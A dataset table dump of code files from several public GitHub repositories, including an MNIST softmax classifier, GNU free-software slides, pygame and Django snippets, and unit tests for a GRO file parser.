blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2
values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107
values | src_encoding stringclasses 20
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 4 6.02M | extension stringclasses 78
values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e95da268eeb27403565a04a05a979ba3c32207e | f363a2c4edd5d475701b7ef5263fdbc5dbda6ecb | /sm.py | 13b563986b32572c089d054e40c64fa734081aea | [] | no_license | michaelwiest/ucsd-cse-253-hw1 | eb9799487ee572e071d40d389a56313c09e64fae | dd95f8b0b8e31ee4e467f3e6b849170ad207c137 | refs/heads/master | 2021-05-05T15:14:17.539289 | 2018-01-18T07:57:13 | 2018-01-18T07:57:13 | 117,298,128 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,716 | py | from mnist import MNIST
import pandas as pd
import numpy as np
import pylab as plt
from helper import *
# np.set_printoptions(threshold=np.nan)
np.set_printoptions(threshold=100)
class SoftMax():
def __init__(self, mnist_directory, lr0=None, lr_dampener=None):
self.mnist_directory = mnist_directory
self.lr_dampener = lr_dampener
self.holdout_data = None
self.holdout_labels_original = None
self.target = None
self.load_data(self.mnist_directory)
print 'Loaded data...'
if lr0 == None:
self.lr0 = 0.001 / self.train_data.shape[0]
else:
self.lr0 = lr0
self.initialize_weights()
def initialize_weights(self):
self.weights = np.zeros((self.train_data.shape[1],
self.num_categories
))
def dl1(self, w):
return np.sign(w)
def dl2(self, w):
return 2 * w
def get_regularized_labels(self, labels):
potential_vals = list(set(labels))
potential_vals.sort()
return np.array([[int(l == p) for p in potential_vals] for l in labels])
def load_data(self, mnist_directory):
mndata = MNIST(mnist_directory)
tr_data, tr_labels = mndata.load_training()
te_data, te_labels = mndata.load_testing()
train_temp = np.array(tr_data)
self.train_data = np.concatenate(
(np.ones((train_temp.shape[0], 1)),
train_temp
), axis=1
)
self.train_labels = np.array(tr_labels)
test_temp = np.array(te_data)
self.test_data = np.concatenate(
(np.ones((test_temp.shape[0], 1)),
test_temp
), axis=1
)
self.test_labels = np.array(te_labels)
self.num_categories = len(list(set(self.train_labels)))
self.possible_categories = list(set(self.train_labels))
self.possible_categories.sort()
def subset_data(self, train_amount, test_amount):
if train_amount > 0:
self.train_data = self.train_data[:train_amount]
self.train_labels = self.train_labels[:train_amount]
else:
self.train_data = self.train_data[-train_amount:]
self.train_labels = self.train_labels[-train_amount:]
if test_amount > 0:
self.test_data = self.test_data[:test_amount]
self.test_labels = self.test_labels[:test_amount]
else:
self.test_data = self.test_data[-test_amount:]
self.test_labels = self.test_labels[-test_amount:]
print 'Subsetted data.'
def prefix_one(self, some_array):
return [[1] + sr for sr in some_array]
def softmax(self, x, w):
dot_exp = np.exp(np.dot(x, w))
summed = np.sum(dot_exp, axis=1)
summed = np.reshape(summed, (dot_exp.shape[0], 1))
summed = np.repeat(summed, dot_exp.shape[1], axis=1)
return (dot_exp / (1.0 * summed))
def L(self, w, x, y):
rvals = self.get_regularized_labels(y)
scores = self.softmax(x, w)
return -1 * np.sum(rvals * np.log(scores))
# return np.sum(y * np.log(self.softmax(x, w)) + (1 - y) * np.log(self.softmax(-x, w)))
def norm_loss_function(self, w, x, y):
y = self.get_regularized_labels(y)
return (-1.0 / (x.shape[0] * w.shape[1])) * np.sum(y * self.softmax(x, w))
def dl(self, w, x, y):
difference = (self.get_regularized_labels(y) - self.softmax(x, w))
return np.dot(np.transpose(x), difference)
def assign_holdout(self, percent):
percent /= 100.0
num_held = int(self.train_data.shape[0] * percent)
self.train_data = self.train_data[:-num_held]
self.train_labels = self.train_labels[:-num_held]
self.holdout_data = self.train_data[-num_held:]
self.holdout_labels = self.train_labels[-num_held:]
print 'Assigned holdout data'
def update_learning_rate(self, iteration):
if self.lr_dampener is not None:
return self.lr0 / (1.0 + iteration / self.lr_dampener)
else:
return self.lr0
def gradient_descent(self, iterations, anneal=True, log_rate=None,
l1=False, l2=False, lamb=None):
if l1 and l2:
raise ValueError('Only do l1 or l2')
if (l1 or l2) and lamb is None:
raise ValueError('Specify lambda if l1 and l2 flags on.')
self.iter_steps = []
self.train_logs = []
self.test_logs = []
self.holdout_logs = []
self.train_loss = []
self.holdout_loss = []
self.test_loss = []
self.weight_lengths = []
lr = self.lr0
for t in xrange(iterations):
if anneal:
lr = self.update_learning_rate(t)
grad = self.dl(self.weights, self.train_data, self.train_labels)
if l1:
grad -= lamb * self.dl1(self.weights)
if l2:
grad -= lamb * self.dl2(self.weights)
self.weights = np.add(self.weights, lr * grad)
if log_rate is not None:
if t % log_rate == 0:
self.weight_lengths.append(np.sum(is_close(self.weights, 0, 0.001)))
self.iter_steps.append(t)
self.train_logs.append(self.evaluate(self.weights,
self.train_data,
self.train_labels)
)
self.train_loss.append(self.norm_loss_function(self.weights,
self.train_data,
self.train_labels)
)
self.test_logs.append(self.evaluate(self.weights,
self.test_data,
self.test_labels)
)
self.test_loss.append(self.norm_loss_function(self.weights,
self.test_data,
self.test_labels)
)
if self.holdout_data is not None:
self.holdout_logs.append(self.evaluate(self.weights,
self.holdout_data,
self.holdout_labels)
)
self.holdout_loss.append(self.norm_loss_function(self.weights,
self.holdout_data,
self.holdout_labels)
)
def evaluate(self, w, x, y):
ind = np.argmax(self.softmax(x, w), axis=1)
pred = [self.possible_categories[i] for i in ind]
return 100.0 - 100.0 * np.sum((pred != y).astype(int)) / (1.0 * x.shape[0])
def train_on_number(self, num, iterations, log_rate=None, anneal=True):
self.reassign_labels_for_target(num)
self.gradient_descent(iterations, anneal=anneal, log_rate=log_rate)
def plot_logs(self):
plt.plot(self.iter_steps, self.train_logs, label='Training Data')
plt.plot(self.iter_steps, self.holdout_logs, label='Holdout Data')
plt.plot(self.iter_steps, self.test_logs, label='Test Data')
plt.ylabel('Percent classified correctly')
plt.xlabel('Iterations')
plt.title('Softmax Regression')
plt.legend(loc='lower right')
plt.show()
plt.plot(self.iter_steps, self.train_loss, label='Training Data')
plt.plot(self.iter_steps, self.holdout_loss, label='Holdout Data')
plt.plot(self.iter_steps, self.test_loss, label='Test Data')
plt.ylabel('Loss Function')
plt.xlabel('Iterations')
plt.title('Softmax Regression')
plt.legend(loc='upper right')
plt.show()
| [
"michaelwiest@Michaels-MacBook-Pro-2.local"
] | michaelwiest@Michaels-MacBook-Pro-2.local |
b23f6427b134d5142d600e52e0c2cae68943e78d | e22a9e5ae2508ba5d3fb6d786f070ea3dbbfa541 | /158A.py | 580895c4dd322c7c4ae91a58d81ebc31f46fc918 | [] | no_license | almakhann/Codeforces | 7ff14c96f1cd09f7c80c5486263aa9012bd74e92 | 9f64a14887471639aa3865ae1f0561c24471ec96 | refs/heads/master | 2022-04-19T04:16:11.160934 | 2020-04-15T16:35:09 | 2020-04-15T16:35:09 | 255,976,903 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | first = input().split(' ')
second = input().split(' ')
count = 0
for i in range(int(first[0])):
if int(second[i]) > 0:
if int(second[i]) >= int(second[int(first[1])-1]):
count += 1
print(count)
| [
"serik97_ktl@mail.ru"
] | serik97_ktl@mail.ru |
bb3d8a5f150df51b5fdef25b495d0d2462c6e144 | aae0461973440174afbf8e75e4ddf0f0c4dd1a9c | /gnu/gnu_slides.py | 1a30f50a3ee380b604a8669eeb4d4ef8b8b97991 | [] | no_license | behdad/slippy | f81eeac68df39eb0f6a7465effacd7239eb24cbf | 5535fe88a785dd75c96171b989f310fcd80e479e | refs/heads/master | 2023-08-29T08:48:40.919688 | 2016-09-27T08:02:01 | 2016-09-27T08:02:01 | 15,673,169 | 20 | 0 | null | 2014-01-10T08:09:47 | 2014-01-06T12:14:35 | Python | UTF-8 | Python | false | false | 5,180 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
slides = []
def slide_add(f, data=None, width=800, height=400):
slides.append ((f, data, width, height))
return f
import pango
def text_slide (l):
def s (r):
for i in l:
yield i
for i in range (30):
yield ''
slide_add (s, data={'align': pango.ALIGN_LEFT})
texts = {}
texts['en'] = """“Free software” is a matter of liberty, not price. To understand the
concept, you should think of “free” as in “free speech”, not as in “free beer.”
Free software is a matter of the users' freedom to run, copy,
distribute, study, change and improve the software.
More precisely, it refers to four kinds of freedom, for the users of the
software:
------------------------------------------------------------------------------
0. The freedom to run the program, for any purpose.
1. The freedom to study how the program works, and adapt it to your needs.
Access to the source code is a precondition for this.
2. The freedom to redistribute copies so you can help your neighbor.
3. The freedom to improve the program, and release your improvements to
the public, so that the whole community benefits.
Access to the source code is a precondition for this.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
texts['de'] = """Bei dem Begriff „Freie Software“ geht es um Freiheit, nicht um den Preis.
Um dieses Konzept richtig begreifen zu können, sollte man an „frei“ wie in
„freie Rede“ denken, und nicht an „Freibier“.
Bei „Freier Software“ geht es um die Freiheit des Benutzers die Software nach
Belieben zu benutzen, zu kopieren, weiter zu geben, die Software zu studieren,
sowie Änderungen und Verbesserungen an der Software vornehmen zu können.
------------------------------------------------------------------------------
Genauer gesagt, bezieht sich der Begriff „Freie Software“ auf vier Arten von
Freiheit, die der Benutzer der Software hat:
0. Die Freiheit, das Programm für jeden Zweck zu benutzen.
1. Die Freiheit, zu verstehen, wie das Programm funktioniert und wie man es
für seine Ansprüche anpassen kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
2. Die Freiheit, Kopien weiterzuverbreiten, so dass man seinem Nächsten
weiterhelfen kann.
3. Die Freiheit, das Programm zu verbessern und die Verbesserungen der
Allgemeinheit zur Verfügung zu stellen, damit die ganze Gemeinschaft davon
profitieren kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
Diese 4 Freiheiten (0-3) wurden so von Richard Stallman entworfen.
Um mit gutem Beispiel voran zu gehen, hat er angefangen, ein vollständig
freies Betriebssystem zu entwickeln.
Heute werden Linux basierte GNU Systeme von vielen Millionen Anwendern benutzt."""
texts['he'] = """"תוכנה חופשית" זה ענײן של חירות, לא של מחיר. כדי להבין את העקרון,
צריך לחשוב על "חופש" כמו ב"חופש הביטוי"...\
.effectpause
.back 3
ולא כמו ב"בירה חופשי".
תוכנה חופשית נוגעת לחופש של משתמשים להריץ, להפיץ הפצת-המשך, ללמוד,
לשנות ולשפר את התוכנה. ליתר דיוק, זה מתײחס לארבעה סוגים של חירות למשתמשי
התוכנה:
------------------------------------------------------------------------------
0. החופש להריץ את התוכנה, לכל מטרה שהיא.
1. החופש ללמוד איך תוכנה עובדת, ולשנות אותה לצרכיהם.
גישה לקוד המקור היא תנאי מקדים לכך.
2. החופש להפיץ עותקים בהפצה-חוזרת כדי שיוכלו למשל לעזור לשכנים שלהם.
3. החופש לשפר את התוכנה, ולשחרר את השיפורים שלהם לציבור, כך שכל הקהילה תרויח.
גישה לקוד-המקור היא תנאי מקדים לכך.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
import os, re
lang = os.getenv ('LANG')
i = lang.find ('_')
if i > 0:
lang = lang[:i]
text = texts.get (lang, texts['en'])
def break_on_dashlines (text):
s = ''
for line in text.split ('\n'):
if re.match ('^----*$', line):
yield s
s = ''
else:
if s:
s += '\n'
s += line
yield s
for slide in break_on_dashlines (text):
text_slide (slide)
if __name__ == "__main__":
import slippy
import gnu_theme
slippy.main (slides, gnu_theme, args = ['--slideshow', '--delay', '0.05', '--repeat'])
| [
"behdad@behdad.org"
] | behdad@behdad.org |
4c8f7e6ae2aeddd5c42226129d42c4cb4aab080a | 3ab599127dc2fc89cfee5f3ee3a91168499cb475 | /tests/notebooks/print.py | f53c6110196004fd9f0397077b033b4cca94f792 | [
"BSD-3-Clause"
] | permissive | maartenbreddels/voila | 17dfb39c131ffad4b3b51926214dc71a2e06a964 | d3a52abdd34b68bdabdd8f0ae34071711cd16742 | refs/heads/master | 2022-05-11T05:47:44.843627 | 2020-09-28T09:58:37 | 2020-09-28T09:58:37 | 149,579,689 | 2 | 1 | NOASSERTION | 2020-05-27T07:59:20 | 2018-09-20T08:50:19 | Python | UTF-8 | Python | false | false | 284 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python
# ---
print('Hi Voilà!')
| [
"maartenbreddels@gmail.com"
] | maartenbreddels@gmail.com |
1106db283ff566d316750ba1076bb9539d901e37 | 3f2639c02a3658c43c7bf971069883d23239e8b9 | /100+ Exercises Solved/Question - 5.py | 9348976ab4f0a6b6acd1310d9a00ef9d8640159a | [] | no_license | Ellipse404/100-Exercises-Python-Programming- | 0da5882b23ce4a050fe952db8302cc0041241870 | d00e966aeb3d6c5870c89f8606fdc32bae964fe5 | refs/heads/master | 2021-05-24T11:54:08.237919 | 2020-04-06T16:10:38 | 2020-04-06T16:10:38 | 253,547,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Jul 16 16:54:45 2019
@author: BHASKAR NEOGI
"""
# Level - 1
class String(object) :
def __init__ (self) : # U may not use these 2 lines.
self.s = ""
def getString(self) : # If u take variables without self -> due to unused this value it'll show error.
self.s = input("Enter The Value To Convert into String : ")
# self without '.s' works as a normal variable & to execute self argument '.s' is used.
def printString(self) :
print("Output : ",self.s.upper())
k = String()
k.getString()
k.printString()
| [
"noreply@github.com"
] | noreply@github.com |
3beb6d4f595049104745ef63df90443dbd500e9d | cd4f3bd30bb4e85fc824e21defbb950f42e2f103 | /Item/Couches.py | 9afd515a399502727c11322bc201379024d5c455 | [] | no_license | XelekGakure/ReceipAdministrator | db727a55479b4bf65ae2e4c1530091821c415bb5 | 7338db681fdb210ffe5e456eedfa54b5e91c05a4 | refs/heads/master | 2021-01-08T03:43:56.613347 | 2020-02-20T14:27:32 | 2020-02-20T14:27:32 | 241,902,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 117 | py | from Item import Item
class Couches(Item):
def __init__(self) -> None:
super().__init__(15, "Couches")
| [
"julien.lauret.pro@gmail.com"
] | julien.lauret.pro@gmail.com |
20d0c280fe8495075d08fc145034ff128292e4f0 | 300454fee89ca862fcdef2da93e1034398642291 | /display.py | ce4a7c3909f815f129185b1693ea5233721227c4 | [
"MIT"
] | permissive | mehranjeelani/SR_gan | 238982092e7d8134a20aea54c610a5db5d490878 | abd835ff265054838205869bbdad63d87745b5e0 | refs/heads/master | 2022-12-02T10:27:12.262593 | 2020-08-08T07:24:26 | 2020-08-08T07:24:26 | 275,428,468 | 0 | 0 | MIT | 2020-07-18T00:26:36 | 2020-06-27T18:12:13 | Python | UTF-8 | Python | false | false | 3,584 | py | import argparse
import os
from math import log10
import pandas as pd
import torch.optim as optim
import torch.utils.data
import torchvision.utils as utils
from torch.autograd import Variable
from torch.utils.data import DataLoader
from tqdm import tqdm
import torch.nn as nn
import pytorch_ssim
from data_utils import TrainDatasetFromFolder, ValDatasetFromFolder, display_transform
from loss import GeneratorLoss
from model import Generator, Discriminator
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
nn.init.normal_(m.weight.data, 0.0, 0.02)
elif classname.find('BatchNorm') != -1:
nn.init.normal_(m.weight.data, 1.0, 0.02)
nn.init.constant_(m.bias.data, 0)
#torch.autograd.set_detect_anomaly(True)
parser = argparse.ArgumentParser(description='Train Super Resolution Models')
parser.add_argument('--crop_size', default=80, type=int, help='training images crop size')
parser.add_argument('--upscale_factor', default=4, type=int, choices=[2, 4, 8],
help='super resolution upscale factor')
parser.add_argument('--num_epochs', default=200, type=int, help='train epoch number')
parser.add_argument('--data_set',default='Pascal_VOC',type=str,help='training dataset')
parser.add_argument('--case',default = 'train_with_noise_std_1',type = str,help = 'noise type')
lr = 0.0002
beta1 = 0.5
best_model = None
best_gen = None
if __name__ == '__main__':
opt = parser.parse_args()
CROP_SIZE = opt.crop_size
UPSCALE_FACTOR = opt.upscale_factor
NUM_EPOCHS = opt.num_epochs
DATASET = opt.data_set
CASE = opt.case
train_set = TrainDatasetFromFolder('data/train/'+DATASET+'/train_HR', crop_size=CROP_SIZE, upscale_factor=UPSCALE_FACTOR)
val_set = ValDatasetFromFolder('data/train/'+DATASET+'/valid_HR', upscale_factor=UPSCALE_FACTOR)
train_loader = DataLoader(dataset=train_set, num_workers=4, batch_size=64, shuffle=True)
val_loader = DataLoader(dataset=val_set, num_workers=4, batch_size=1, shuffle=False)
out_path = 'training_results/'+DATASET+'/SRF_' + str(UPSCALE_FACTOR) + '/'+CASE+'/'
if not os.path.exists(out_path):
os.makedirs(out_path)
with torch.no_grad():
val_bar = tqdm(val_loader)
val_images = []
for val_lr, val_hr_restore, val_hr in val_bar:
batch_size = val_lr.size(0)
lr = val_lr
hr = val_hr
if torch.cuda.is_available():
lr = lr.cuda()
hr = hr.cuda()
val_images.extend(
[display_transform()(val_lr.squeeze(0)),display_transform()(val_hr_restore.squeeze(0)),
display_transform()(hr.data.cpu().squeeze(0))])
val_bar.set_description('Generating SR images for validation set')
val_images = torch.stack(val_images)
#print('total number of images are {} total number of chunks are {}'.format(val_images.size(0),val_images.size(0)//15))
val_images = torch.split(val_images, 15)
#print('bfore tqdm val images shape is {}'.format(val_images[0].shape))
val_save_bar = tqdm(val_images[:-1], desc='[saving validation SR images]')
#print('images per chunk:{}'.format( val_save_bar[0].shape))
index = 1
for image in val_save_bar:
#print('image shpae is {}'.format(image.shape))
image = utils.make_grid(image, nrow=3, padding=5)
utils.save_image(image, out_path + 'index_%d_%s.png' % (index,CASE), padding=5)
index += 1
| [
"mehranjeelani@gmail.com"
] | mehranjeelani@gmail.com |
d7d088644cfa61a4680b4b1b727799c44e89f857 | 67d0f6bfe81bae6aa32d179de1a3a5f8e14b11d1 | /extranet/migrations/0003_student_group.py | e5ecda2cc9d8323692940499a3d8baebeb00440e | [] | no_license | jakubmisiak/wsb-programowanie-obiektowe | 386e1d36679d2c65cdd3f344a8b9a681e34a3b19 | 5eb46b738fb5c2d72f056dd47721cc7fe7909b65 | refs/heads/main | 2023-03-25T20:19:45.577350 | 2020-12-16T21:22:02 | 2020-12-16T21:22:02 | 352,344,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 525 | py | # Generated by Django 3.1.4 on 2020-12-04 20:50
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('auth', '0012_alter_user_first_name_max_length'),
('extranet', '0002_student'),
]
operations = [
migrations.AddField(
model_name='student',
name='group',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='auth.group'),
),
]
| [
"noreply@github.com"
] | noreply@github.com |
e85424d2b73d54e38f10a2da90d91825bc10d932 | 173b16ed4476557501145e149b0426e2e28aaacb | /doodlebob.py | dcf7d51ace2bea05cd43e00db46b74596d899ad7 | [] | no_license | jlovoi/doodlebob_adventures | 3ebcb61872c1fec90451a962d7f0f1777cb9f326 | d125c26d801a21d685be706fe1c83c43e0e1747e | refs/heads/master | 2021-09-05T21:20:26.437298 | 2018-01-31T03:30:22 | 2018-01-31T03:30:22 | 119,625,734 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | import pygame
class Doodle():
"""settings for doodle placement"""
def __init__(self, settings, screen):
self.screen = screen # need doodle.screen in order to reference/use the original screen
self.settings = settings
self.image = pygame.image.load('images/doodlebob.bmp')
self.rect = self.image.get_rect()
self.screen_rect = screen.get_rect()
# set position for doodlebob
self.rect.centerx = self.screen_rect.centerx # these are part of the API
self.rect.bottom = self.screen_rect.bottom
# Decimal value for doodle.rect, since it is currently stored as integer
self.center = float(self.rect.centerx)
# Set moving flags as False
self.moving_right = False
self.moving_left = False
def update(self):
"""update movement of Doodlebob based on moving flags"""
if self.moving_right and self.rect.right < self.screen_rect.right:
self.center += self.settings.doodle_speed_factor
if self.moving_left and self.rect.left > 0:
self.center -= self.settings.doodle_speed_factor
# Update the position of the ship
self.rect.centerx = self.center
def blitme(self):
"""Draw doodle at current position"""
self.screen.blit(self.image, self.rect)
def center_doodle(self):
"""Center doodle at bottom of screen"""
self.center = self.screen_rect.centerx | [
"jlovoi@Josephs-MacBook-Pro.local"
] | jlovoi@Josephs-MacBook-Pro.local |
87bb2d668f30b7eb6f87e3194c21c258c21263f5 | 9a48c9dd431b1bcae0c338f5075177d4dcf9c71b | /lib/stats.py | 870441dd6c9c0ff71862228a041515c96c241420 | [
"ICU",
"MIT"
] | permissive | ravikt/OpticalFlowToolkit | f683f1932f07f76ab50e4c338f08205cc8aa2eb7 | 410246072c0de7e5e071c30682674a0b6186d74e | refs/heads/master | 2020-06-08T17:19:02.421818 | 2019-06-22T19:22:16 | 2019-06-22T19:22:16 | 193,271,247 | 0 | 0 | MIT | 2019-06-22T19:19:00 | 2019-06-22T19:19:00 | null | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/python
"""
stats.py
This file generates data statistics
Author : Ruoteng Li
Date 16 Oct 2016
"""
import numpy as np
import os
from PIL import Image
full = 196608
input_dir = '../../../data/FC/data'
output_dir = '../SegNet/CamVid/trainflowannot'
files = os.listdir(output_dir)
files.sort()
stats = [0, 0, 0, 0, 0, 0, 0, 0, 0]
for j in range(22276):
file_name = files[j]
img = Image.open(os.path.join(output_dir, file_name))
data = np.array(img)
for i in range(9):
idx = (data == i)
stats[i] += float(np.sum(idx)) / full
for i in range(len(stats)):
stats[i] /= 22276
print stats[i] | [
"liruoteng@gmail.com"
] | liruoteng@gmail.com |
3d0dc04dc9e883dc6cccaa6b0935ef9c431fc6cc | adeee7988d712c7670d9743b4b4a0d52d62da9c9 | /nvesta/api/views/v1/__init__.py | 97e76cc77702bb3f22fa758e2475e80167062aca | [] | no_license | MarsStirner/nvesta | 632d040fa45c4d3b6e4a65bf1085935a27bdbd1d | d36d5e4b9403e4692dde276b43962e0430657a76 | refs/heads/master | 2020-12-03T00:33:45.775802 | 2016-08-19T09:28:34 | 2016-08-19T09:28:34 | 96,042,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 98 | py | # -*- coding: utf-8 -*-
from . import apiutils, dictionary, hs, kladr
__author__ = 'viruzzz-kun'
| [
"m.malkov@bars-open.ru"
] | m.malkov@bars-open.ru |
cab3722b1448cd41cbd498434b184e0056ab54bd | c5c0d18688c5a4b0f2cd9fb73e3591c09af39230 | /agrost/apps.py | 5fc917b860cf40a27117cdf998a62e2220f516f3 | [] | no_license | AmitGamot/Agri-Analytics | 69b1b92172845f7e734d5b2f12bba9731dbf4dcb | c314357bc2c91fe19bc312f9aae6789acc35751a | refs/heads/master | 2023-05-26T23:35:59.138568 | 2021-05-30T05:32:00 | 2021-05-30T05:32:00 | 370,703,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | from django.apps import AppConfig
class AgrostConfig(AppConfig):
name = 'agrost'
| [
"amitgamot05@gmail.com"
] | amitgamot05@gmail.com |
c5e98de5ca67d6b8ad2c8ba8c594dfe40d51ba48 | 2f83cebda902ad0ae60f6b4eb6b6f37742671e1d | /tests/test_groio.py | 8a66bb8c99d6d3162040028b58112dfbb0697bc2 | [
"MIT"
] | permissive | jbarnoud/groio | ccb5eb381979927e393e3235fff2fef99148b44f | f387c42c067db1466114e775640440371c381f6d | refs/heads/master | 2021-01-24T00:03:32.627337 | 2015-09-11T13:16:42 | 2015-09-11T13:16:42 | 42,727,769 | 1 | 1 | null | 2015-09-18T14:38:08 | 2015-09-18T14:38:07 | null | UTF-8 | Python | false | false | 6,389 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Unit tests for groio library
"""
from __future__ import division, print_function
import unittest
import os
import sys
import contextlib
import groio
__author__ = "Hubert Santuz & Jonathan Barnoud"
# Path to the directory containing the material for tests
REFDIR = os.path.join(os.path.dirname(__file__),"test_resources")
# Gro files usually store coordinates with decimals. Let's be precise
# until the fourth one.
PRECISION = 4
class TestReadWrite(unittest.TestCase):
"""
Test for reading and writing a GRO file.
"""
def test_read(self):
"""
Test the reading of a regular gro file
"""
path = os.path.join(REFDIR, "regular.gro")
title, atoms, box = groio.parse_file(path)
nb_atoms = len(atoms)
self.assertEqual(title, "Regular AA\n")
self.assertEqual(box, " 5.15414 5.15414 7.93645\n")
self.assertEqual(nb_atoms, 14961)
# Pick a random atom
# 24POPC C220 1235 2.520 4.888 3.113
atom = atoms[1234]
keys_tested = ['resid', 'atomid', 'x', 'z']
values_tested = [24, 1235, 2.520, 3.113]
for key, value in zip(keys_tested, values_tested):
self.assertEqual(atom[key], value)
def test_fail_read(self):
"""
Test the bad formating of a gro file
"""
files = ["fail.gro", "fail_100000.gro", "missing_total_atoms.gro"]
files_desc = [os.path.join(REFDIR, filin) for filin in files]
print(files_desc)
for filin in files_desc:
with self.assertRaises(groio.FormatError) as context:
groio.parse_file(filin)
self.assertEqual("Something is wrong in the format", context.exception)
def test_write(self):
"""
Test the writing of a gro file
"""
# Create a random file
title, atoms, box = _generate_file()
# Write it
test_write = os.path.join(REFDIR, "test_write.gro")
with open(test_write, "w") as fout:
for line in groio.write_gro(title, atoms, box):
print(line, end='', file=fout)
# Reference file
ref_write = os.path.join(REFDIR, "write.gro")
with open(ref_write) as f1, open(test_write) as f2:
ref_readlines = f1.readlines()
test_readlines = f2.readlines()
self.assertEqual(ref_readlines, test_readlines)
os.remove(test_write)
def _generate_file():
"""
Generate the header and atoms of a random gro file.
Match the file write.gro to test purposes.
:Returns:
- title: the title of the system
- atoms: a list of atom, each atom is stored as a dictionary
- box: the box description
"""
title = "Write\n"
atoms = []
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "C31",
'atomid': 1, 'x': 1.764, 'y': 4.587, 'z': 2.046})
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "N1",
'atomid': 2, 'x': 1.824, 'y': 4.555, 'z': 1.916})
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "C32",
'atomid': 3, 'x': 1.755, 'y': 4.436, 'z': 1.864})
atoms.append({'resid': 1, 'resname': "POPC", 'atom_name': "C33",
'atomid': 4, 'x': 1.954, 'y': 4.503, 'z': 1.960})
box = " 1.000 1.000 1.000\n"
return (title, atoms, box)
class TestGrolib(unittest.TestCase):
"""
Tests for the other functions in the library.
"""
def test_renumber(self):
"""
Test the atom renumbering with the renumber function
"""
path = os.path.join(REFDIR, "regular.gro")
title, atoms, box = groio.parse_file(path)
removed_res = (10, 50, 60)
# Remove some residues and renumber atoms and residues
renumbered = _create_runumbered(atoms, removed_res)
# Check numbering
# (number of atom per residue, number of residue)
topology = ((52, 72 - len(removed_res)), (3, 3739))
_test_renumber(renumbered, topology)
def residue_numbers(topology, start_res=1):
"""
Generate residue numbers according to a topology.
Topology is a list of successive succession of residues described as
(number of atom per residue, number of residue). For instance, a succession
of 8 residue of 10 atoms each followed by 5 residues of 3 atoms each is
described as ((10, 8), (3, 5)).
:Parameters:
- topology: the residue succession as described above
- start_res: the number of the first residue
"""
resid = start_res - 1
for natoms, nresidues in topology:
for residue in range(nresidues):
resid += 1
if resid > 99999:
resid = 1
for atoms in range(natoms):
yield resid
def _create_runumbered(atoms, removed_res):
"""
Remove residues from a structure and renumber the atoms and residues.
:Parameters:
- atoms: the list of dictionnary for atoms
- remove_res: a list of resid to remove from the structure
:Returns:
- the new list renumbered
"""
# Remove some residues
keep = [atom for atom in atoms if not atom['resid'] in removed_res]
# Renumber residues and atoms
renumbered = groio.renumber(keep)
return renumbered
def _test_renumber(atoms, topology):
"""
Test atom renumbering.
:Parameters:
- atoms: the list of dictionnary for atoms
- topology: the residue succession, see :func:`residue_numbers`
"""
for line_number, (ref_resid, atom) \
in enumerate(zip(residue_numbers(topology),
atoms)):
resid = atom["resid"]
atomid = atom["atomid"]
ref_atomid = line_number + 1
# Check the residue
assert resid == ref_resid, \
("Residue ID is wrong after renumbering: "
"{0} instead of {1} at line {2}").format(
resid, ref_resid, line_number + 3)
# Check the atom
assert atomid == ref_atomid, \
("Atom ID is wrong after renumbering: "
"{0} instead of {1} at line {2}").format(
atomid, ref_atomid, line_number + 3)
if __name__ == "__main__":
unittest.main()
| [
"hubert.santuz@gmail.com"
] | hubert.santuz@gmail.com |
b8664ce8a44166d29e61a75e3ca17132ba423261 | 76eb17916555462a9219cb7cfea741b2281ace7b | /testbot/urls.py | 8b8843e97dfa5a7526faad8d82ac7c207b0cbefc | [
"MIT"
] | permissive | luungoc2005/chatbot_test | 6ecabbe507d01418282a883d6ab70eb10130c991 | f8c901c9c14a50727a7b514dda1e569c8180b458 | refs/heads/master | 2021-08-30T13:07:20.132250 | 2017-11-15T03:35:47 | 2017-11-15T03:35:47 | 105,901,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | from django.urls import path
from . import views
urlpatterns = [
# ex: /testbot/
path('', views.index, name='index'),
path('examples/', views.examples, name='examples'),
path('test/', views.test, name='test'),
] | [
